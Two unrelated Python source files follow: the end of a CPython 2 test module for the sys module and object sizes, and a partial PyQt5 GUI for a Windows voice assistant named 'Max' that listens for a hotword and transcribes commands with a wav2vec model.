def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assertTrue(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non-existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
@test.test_support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
check_sizeof = test.test_support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
size = test.test_support.calcobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size('l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size('P PP') + gc_header_size)
def test_default(self):
size = test.test_support.calcobjsize
self.assertEqual(sys.getsizeof(True, -1), size('l'))
def test_objecttypes(self):
# check all types defined in Objects/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# bool
check(True, size('l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size('2P2Pil'))
# builtin_function_or_method
check(len, size('3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('iPP') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size('P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size('7P'))
# instance (old-style class)
check(class_oldstyle(), size('3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size('4P'))
# complex
check(complex(0,1), size('2d'))
# code
check(get_cell().func_code, size('4i8Pi3P'))
# BaseException
check(BaseException(), size('3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size('5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size('5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size('5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size('2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size('2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size('3P2P' + 8*'P2P') + 16*struct.calcsize('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size('P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size('P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size('P2PPP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('l3P'))
# file
check(self.file, size('4P2i4P3i3P3i'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('P'))
# classmethod
check(bar, size('P'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pi2P'))
# integer
check(1, size('l'))
check(100, size('l'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('lP'))
# long
check(0L, vsize(''))
check(1L, vsize('') + self.longdigit)
check(-1L, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('P'))
# None
check(None, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size('4l'))
# reverse
check(reversed(''), size('PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size('P3P'))
# slice
check(slice(1), size('3P'))
# str
vh = test.test_support._vheader
check('', struct.calcsize(vh + 'lic'))
check('abc', struct.calcsize(vh + 'lic') + 3)
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# tupleiterator
check(iter(()), size('lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = vsize('P2P15Pl4PP9PP11PI') + struct.calcsize('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size('PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size('2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pl2P'))
# xrange
check(xrange(1), size('3l'))
check(xrange(66000), size('3l'))
def test_pythontypes(self):
# check all types defined in Python/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
app.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" This file contains the GUI for the SimpleDigitalAssistant application.
This application is made specifically for Windows OS, and can be used
to accomplish small tasks via automatic speech recognition (using pre-trained
models)."""
__author__ = ["Hannan Khan", "Salman Nazir", "Reza Mohideen", "Ali Abdul-Hameed"]
__copyright__ = "Copyright 2022, SimpleDigitalAssistant"
__credits__ = ["Hannan Khan", "Salman Nazir", "Reza Mohideen", "Ali Abdul-Hameed"]
__license__ = "MIT"
__version__ = "1.0"
__maintainer__ = "Hannan Khan"
__email__ = "hannankhan888@gmail.com"
import os.path
import sys
import threading
import time
import json
import numpy as np
import pyaudio
import sounddevice as sd
from PyQt5 import QtWidgets, QtGui, QtTextToSpeech
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QFontDatabase, QCursor, QPixmap
from PyQt5.QtWidgets import QHBoxLayout, QLabel, QVBoxLayout
from PyQt5.QtWidgets import QMainWindow, QApplication, QDesktopWidget, QFrame, QSplashScreen
from Actions.actions import Action
from VoiceRecognition.Wav2vecLive.inference import Wave2Vec2Inference
from utils.dynamicPyQt5Labels import CustomButton
from utils.dynamicPyQt5Labels import ImageChangingLabel, ImageBackgroundChangingLabel
from utils.framelessDialogs import FramelessMessageDialog, FramelessScrollableMessageDialog
from utils.framelessDialogs import FramelessSettingsDialog
CHUNK = 1024
SAMPLE_FORMAT = pyaudio.paInt16
CHANNELS = 1
SAMPLE_RATE = 16000
NUMPY_DATATYPE = np.int16
class RootWindow(QMainWindow):
""" This class is the main window of our application. It creates and calls an
inference object Wave2Vec2Inference which uses a pretrained model to achieve
automatic speech recognition."""
def __init__(self, model_name):
super(RootWindow, self).__init__()
self.splash = QSplashScreen(QPixmap('./resources/images/icon.ico'))
self.splash.show()
self.WIDTH = 1024
self.HEIGHT = 576
self.app_name = "SimpleDigitalAssistant"
self.settings = {}
self.mousePressPos = None
self.mouseMovePos = None
self.listening_for_max = False
self.recording = False
self.should_take_action = True
self.p = None
self.stream = None
self.buffer = []
self.np_buffer = None
self.threads = []
self.action_thread = None
self.recording_thread = None
self.listening_for_max_thread = None
self.asr_print_thread = None
self.transcribed_text = ""
self.model_name = model_name
self.wav2vec_inference = Wave2Vec2Inference(self.model_name)
# self.wav2vec_inference = Wave2Vec2Inference(self.model_name, lm_path=r"C:\Users\HannanKhan\Downloads\4-gram-librispeech.bin")
self.speech = QtTextToSpeech.QTextToSpeech()
self.action = Action(self.speech)
self.setFixedWidth(self.WIDTH)
self.setFixedHeight(self.HEIGHT)
# opens the window in the middle of the screen.
self.qtRectangle = self.frameGeometry()
self.centerPoint = QDesktopWidget().availableGeometry().center()
self.qtRectangle.moveCenter(self.centerPoint)
self.move(self.qtRectangle.topLeft())
# create a Frameless window
self.setWindowFlags(Qt.FramelessWindowHint)
# add the window icon
self.setWindowIcon(QtGui.QIcon("resources/images/icon.ico"))
# create a font database, and load the custom Lato-Thin font
self.font_database = QFontDatabase()
self.lato_font_id = self.font_database.addApplicationFont("resources/fonts/Lato-Light.ttf")
self.lato_font_family = self.font_database.applicationFontFamilies(self.lato_font_id).__getitem__(0)
self.current_font = QFont(self.lato_font_family, 15)
# create a main frame for overall layout
self.main_frame = QFrame()
self.main_frame_stylesheet = """
QFrame {background-color: rgb(255, 232, 214)}
"""
self.main_frame.setStyleSheet(self.main_frame_stylesheet)
self.main_frame_layout = QVBoxLayout()
self.main_frame_layout.setSpacing(0)
self.main_frame_layout.setContentsMargins(0, 0, 0, 0)
self.main_frame_layout.setAlignment(Qt.AlignTop)
self._init_settings()
self._init_colors()
self._init_sound_devices()
self._init_bottom_main_frame()
self._init_window_frame()
# self._start_action_thread()
self.main_frame_layout.addWidget(self.bottom_main_frame)
self.main_frame.setLayout(self.main_frame_layout)
self.setCentralWidget(self.main_frame)
self.show()
self.splash.close()
self.speech.say("Hello, I'm Max.")
self.start_listening_for_max_thread()
def _init_bottom_main_frame(self) -> None:
self.bottom_main_frame = QFrame()
self.bottom_main_frame_layout = QHBoxLayout()
self.bottom_main_frame_layout.setSpacing(50)
self.bottom_main_frame_layout.setContentsMargins(10, 70, 40, 10)
self.bottom_main_frame_layout.setAlignment(Qt.AlignLeft)
self.bottom_left_main_frame = QFrame()
self.bottom_left_main_frame_layout = QVBoxLayout()
self.bottom_left_main_frame_layout.setSpacing(50)
self.bottom_left_main_frame_layout.setContentsMargins(10, 10, 0, 10)
self.bottom_left_main_frame_layout.setAlignment(Qt.AlignCenter)
self.welcome_label = QLabel()
self.welcome_label.setFont(QFont(self.lato_font_family, 20))
self.welcome_label.setStyleSheet("""
            QLabel { color: rgb(88, 105, 126); }
""")
self.welcome_label.setWordWrap(True)
self.welcome_label.setText("Welcome to your digital assistant, MAX!")
self.output_label = QtWidgets.QTextEdit()
self.output_label.setReadOnly(True)
self.output_label.setFont(QFont(self.lato_font_family, 10))
self.output_label.setTextInteractionFlags(Qt.NoTextInteraction)
self.output_label.setCursor(QCursor(Qt.ArrowCursor))
self.mic_label = ImageChangingLabel("resources/images/mic_normal_icon.png",
"resources/images/mic_highlight_icon.png", self._start_recording_thread,
350, 350)
self.bottom_left_main_frame_layout.addWidget(self.welcome_label)
self.bottom_left_main_frame_layout.addWidget(self.output_label)
self.bottom_left_main_frame.setLayout(self.bottom_left_main_frame_layout)
self.bottom_main_frame_layout.addWidget(self.bottom_left_main_frame)
self.bottom_main_frame_layout.addWidget(self.mic_label)
self.bottom_main_frame.setLayout(self.bottom_main_frame_layout)
def _init_sound_devices(self) -> None:
if self.p:
self.p.terminate()
self.p = pyaudio.PyAudio()
self.input_device_dict = pyaudio.PyAudio.get_default_input_device_info(self.p)
self.input_device_idx = self.input_device_dict['index']
self.input_device_name = self.input_device_dict["name"]
# max input channels is 1
self.input_channels = self.input_device_dict['maxInputChannels']
# default sampleRate is 44100
self.default_sample_rate = self.input_device_dict['defaultSampleRate']
self.output_device_dict = pyaudio.PyAudio.get_default_output_device_info(self.p)
self.output_device_num = self.output_device_dict['index']
self.output_device_name = self.output_device_dict["name"]
if self.stream:
self.stream.stop_stream()
self.stream.close()
self.stream = self.p.open(rate=SAMPLE_RATE, channels=CHANNELS, format=SAMPLE_FORMAT,
frames_per_buffer=CHUNK, input=True)
def mousePressEvent(self, a0: QtGui.QMouseEvent) -> None:
self.mousePressPos = None
self.mouseMovePos = None
if (a0.button() == Qt.LeftButton) and self.window_frame.underMouse():
self.mousePressPos = a0.globalPos()
self.mouseMovePos = a0.globalPos()
super(RootWindow, self).mousePressEvent(a0)
def mouseMoveEvent(self, a0: QtGui.QMouseEvent) -> None:
if (a0.buttons() == Qt.LeftButton) and (self.window_frame.underMouse()):
curr_pos = self.pos()
global_pos = a0.globalPos()
diff = global_pos - self.mouseMovePos
new_pos = curr_pos + diff
self.move(new_pos)
self.mouseMovePos = global_pos
super(RootWindow, self).mouseMoveEvent(a0)
def mouseReleaseEvent(self, a0: QtGui.QMouseEvent) -> None:
super(RootWindow, self).mouseReleaseEvent(a0)
def _init_settings(self) -> None:
if os.path.exists("settings.json"):
with open("settings.json", 'r') as settings_file:
self.settings = json.load(settings_file)
else:
with open("settings.json", "w") as settings_file:
json.dump(self.settings, settings_file)
def _init_colors(self) -> None:
# Champagne Pink
self.normal_bg = QtGui.QColor()
self.normal_bg.setRgb(255, 232, 214)
# Macaroni and Cheese
self.highlight_bg = QtGui.QColor()
self.highlight_bg.setRgb(255, 186, 133)
# Dark Electric Blue
self.normal_color = QtGui.QColor()
self.normal_color.setRgb(88, 105, 126)
# Cadet Grey
self.highlight_color = QtGui.QColor()
self.highlight_color.setRgb(141, 157, 175)
# Grey (american silver) color for minimize button
self.minimize_button_label_highlight_bg = QtGui.QColor()
self.minimize_button_label_highlight_bg.setRgb(229, 229, 229)
# Red Color for close button
self.close_button_label_highlight_bg = QtGui.QColor()
self.close_button_label_highlight_bg.setRgb(255, 87, 51)
# White color (champagne flute) for close button when highlighted
self.close_button_label_highlight_color = QtGui.QColor()
self.close_button_label_highlight_color.setRgb(246, 234, 226)
def _init_window_frame(self) -> None:
self.window_frame = QtWidgets.QFrame()
self.window_frame.setFixedHeight(60)
""" Window_frame will have two sub frames, one for the left half, includes the
icon and name, and one for the right half, includes the close and minimize
buttons."""
self.window_frame_layout = QtWidgets.QHBoxLayout()
self.window_frame_layout.setSpacing(0)
self.window_frame_layout.setContentsMargins(0, 0, 0, 0)
self.window_frame_left = QtWidgets.QFrame()
self.window_frame_right = QtWidgets.QFrame()
self.wf_left_layout = QtWidgets.QHBoxLayout()
self.wf_left_layout.setSpacing(0)
self.wf_left_layout.setContentsMargins(8, 0, 0, 0)
self.wf_left_layout.setAlignment(Qt.AlignLeft)
self.wf_right_layout = QtWidgets.QHBoxLayout()
self.wf_right_layout.setSpacing(0)
self.wf_right_layout.setContentsMargins(0, 0, 0, 0)
self.wf_right_layout.setAlignment(Qt.AlignRight)
self.app_name_label = CustomButton(self.about, self.normal_bg, self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color)
self.app_name_label.setToolTip("About")
self.app_name_label.setText(self.app_name)
self.app_name_label.setFont(QFont(self.lato_font_family, 11))
self.wf_left_layout.addWidget(self.app_name_label)
self.settings_button_label = ImageBackgroundChangingLabel(self.normal_bg,
self.minimize_button_label_highlight_bg,
"resources/images/settings_normal_icon.png",
"resources/images/settings_highlight_icon.png",
self.settings_dialog, 30, 60)
self.settings_button_label.setToolTip("Settings")
self.settings_button_label.setContentsMargins(0, 0, 5, 0)
self.wf_right_layout.addWidget(self.settings_button_label)
self.minimize_button_label = CustomButton(self.minimize_app, self.normal_bg,
self.minimize_button_label_highlight_bg, self.normal_color,
self.highlight_color)
self.minimize_button_label.setToolTip("Minimize")
self.minimize_button_label.setText(" _ ")
self.minimize_button_label.setFont(QFont(self.lato_font_family, 10))
self.wf_right_layout.addWidget(self.minimize_button_label)
self.close_button_label = CustomButton(self.clean_exit_app, self.normal_bg,
self.close_button_label_highlight_bg,
self.normal_color, self.close_button_label_highlight_color)
self.close_button_label.setToolTip("Close")
self.close_button_label.setText(" / ")
self.close_button_label.setFont(QFont(self.lato_font_family, 10))
self.wf_right_layout.addWidget(self.close_button_label)
self.window_frame_left.setLayout(self.wf_left_layout)
self.window_frame_right.setLayout(self.wf_right_layout)
self.window_frame_layout.addWidget(self.window_frame_left)
self.window_frame_layout.addWidget(self.window_frame_right)
self.window_frame.setLayout(self.window_frame_layout)
self.main_frame_layout.addWidget(self.window_frame)
def _start_action_thread(self):
""" Starts the thread that waits for commands to be transcribed so it can
take action based on the command."""
self.action_thread = threading.Thread(target=self._take_action)
self.action_thread.setDaemon(True)
self.action_thread.setName("action_thread")
self.threads.append(self.action_thread)
self.action_thread.start()
def _take_action(self):
while self.should_take_action:
time.sleep(0.5)
if self.transcribed_text:
if self.transcribed_text == "exit":
self._dirty_exit_app()
self.action.take_action(command=self.transcribed_text)
self.transcribed_text = ""
return
def start_listening_for_max_thread(self):
""" Starts a thread to open a stream and listen for the hotword 'max'.
When the keyword is detected, the start_recording_thread function will be
called."""
self._update_threads()
self.listening_for_max_thread = threading.Thread(target=self._listen_for_max)
self.listening_for_max_thread.setDaemon(True)
self.listening_for_max_thread.setName("listen_for_max_thread")
self.threads.append(self.listening_for_max_thread)
self.listening_for_max_thread.start()
def _listen_for_max(self):
self.buffer = []
self.listening_for_max = True
        # data is of class 'bytes' and needs to be converted into a numpy array.
while self.listening_for_max:
if self.recording:
return
data = self.stream.read(1024)
self.buffer.append(data)
if len(self.buffer) > 10:
self.buffer = self.buffer[-10:]
transcribed_txt = self._transcribe_buffer_audio()
if "max" in transcribed_txt:
# Ready == 0
# Speaking == 1
# Paused == 2
# BackEnd Error == 3
if self.speech.state() == 1:
self.speech.stop()
# self._play_recorded_buffer_audio()
# self.output_label.append(transcribed_txt)
self._start_recording_thread()
self.listening_for_max = False
return
def start_asr_thread(self) -> None:
""" Starts a thread to open a stream (via realTimeAudio.LiveWave2Vec2)
and keep transcribing voice until a keyboard interrupt."""
self.asr_print_thread = threading.Thread(target=self._start_asr_printing)
self.asr_print_thread.setDaemon(True)
self.asr_print_thread.setName("Recording Thread")
self.threads.append(self.asr_print_thread)
self.asr_print_thread.start()
def _start_asr_printing(self) -> None:
try:
while True:
text, sample_length, inference_time = self.asr.get_last_text()
self.output_label.append(text)
self.output_label.moveCursor(QtGui.QTextCursor.End)
print(f"{sample_length:.3f}s\t{inference_time:.3f}s\t{text}")
except KeyboardInterrupt:
self.asr.stop()
def _start_recording_thread(self) -> None:
""" Called by the mic label. Starts a thread that opens a pyaudio stream,
records audio until the mic label is pressed again. After the recording has been
stopped, the audio buffer is transcribed via the Wave2VecInference model,
the stream is closed, and the output text is printed.
There is an option to play the recorded voice back out loud to you (just in case
for debugging). Simply uncomment the appropriate line in self.get_voice_command."""
self._update_threads()
self.mic_label.invert_active_state()
self.recording_thread = threading.Thread(target=self.get_voice_command)
self.recording_thread.setDaemon(True)
self.recording_thread.setName("recording_thread")
self.threads.append(self.recording_thread)
self.recording_thread.start()
# print("threads: ", self.threads)
def get_voice_command(self) -> None:
if self.recording:
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
self.recording = False
self._transcribe_and_print_buffer_audio()
self.action.take_action(self.transcribed_text)
# self._play_recorded_buffer_audio()
QApplication.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.mic_label.invert_active_state()
self.start_listening_for_max_thread()
return
self.buffer = []
self.recording = True
        # data is of class 'bytes' and needs to be converted into a numpy array.
while self.recording:
data = self.stream.read(1024)
self.buffer.append(data)
if len(self.buffer) > 30:
# if the last 15 frames are silence, end the command.
if self._transcribe_custom_length_buffer_audio(self.buffer[-15:]) == "":
self.get_voice_command()
return
def _get_np_buffer(self) -> None:
"""Sets the numpy buffer by converting the bytes object into a numpy array.
The numpy buffer can then be used for inference.
        We divide by 32767 (the maximum value of a signed 16-bit sample) so that the
        buffer becomes a float array (required by the pytorch model) normalized to
        roughly [-1.0, 1.0]. The divisor only controls the amplitude of the audio:
        dividing by small numbers increases the amplitude (loudness), while large
        numbers decrease it (inaudible to the human ear around 500000). The
        transcription is not affected by the amplitude; simply converting the buffer
        to float yields as loud an amplitude as dividing by 1.0."""
self.np_buffer = np.frombuffer(b''.join(self.buffer), dtype=NUMPY_DATATYPE) / 32767
def _play_recorded_buffer_audio(self) -> None:
""" Debugging function, used to get the buffer, and play it back out loud.
Also prints the buffer, and its relevant information."""
self._get_np_buffer()
print("np_buffer: ", self.np_buffer, "| len:", len(self.np_buffer), "| size in memory (bytes)",
(self.np_buffer.size * self.np_buffer.itemsize))
sd.play(self.np_buffer, SAMPLE_RATE)
def _transcribe_buffer_audio(self) -> str:
